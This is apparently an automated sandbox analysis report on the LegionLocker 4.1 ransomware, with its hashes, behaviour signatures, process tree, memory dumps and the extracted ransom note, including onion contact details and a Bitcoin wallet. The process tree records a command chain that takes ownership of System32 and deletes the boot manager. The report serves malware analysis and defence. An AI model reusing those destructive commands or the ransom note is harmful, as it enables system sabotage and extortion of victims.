Overview

overview

10

Static

static

10

LegionLocker4.1.exe

windows7_x64

10

LegionLocker4.1.exe

windows10_x64

10

Resubmissions

26-07-2021 04:39

210726-yf4zy28y4a 10

26-07-2021 03:48

210726-xhrfp51ttx 10

Analysis

  • max time kernel
    150s
  • max time network
    58s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    26-07-2021 04:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LegionLocker4.1.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

Score
10/10
discoveryevasionexploitpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note
Ooops! All your important files are encrypted! What happend to my computer? All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50. How do i pay? Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet. Contact: 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) In case of no anwser in 72 hours write us to this email: [email protected] What if i already paid? Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software, it may cause pernament data loss. Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Disables Task Manager via registry modification
    evasion
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Possible privilege escalation attempt 7 IoCs
    exploit
  • Modifies file permissions 1 TTPs 7 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1116
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1500
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:616
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1868
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1668
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:924
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1056
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:324
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:1456
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:464

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/464-73-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1728-59-0x00000000001B0000-0x00000000001B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-74-0x000000001B8C6000-0x000000001B8E5000-memory.dmp

      Filesize

      124KB

      Download

    • memory/1728-61-0x000000001B8C0000-0x000000001B8C2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1728-76-0x000000001B8E5000-0x000000001B8E6000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-77-0x000000001B8E6000-0x000000001B8E7000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-78-0x000000001B8E7000-0x000000001B8E8000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-79-0x000000001B8E8000-0x000000001B8E9000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-80-0x000000001B8E9000-0x000000001B8EA000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1728-81-0x000000001B8EA000-0x000000001B8EB000-memory.dmp

      Filesize

      4KB

      Download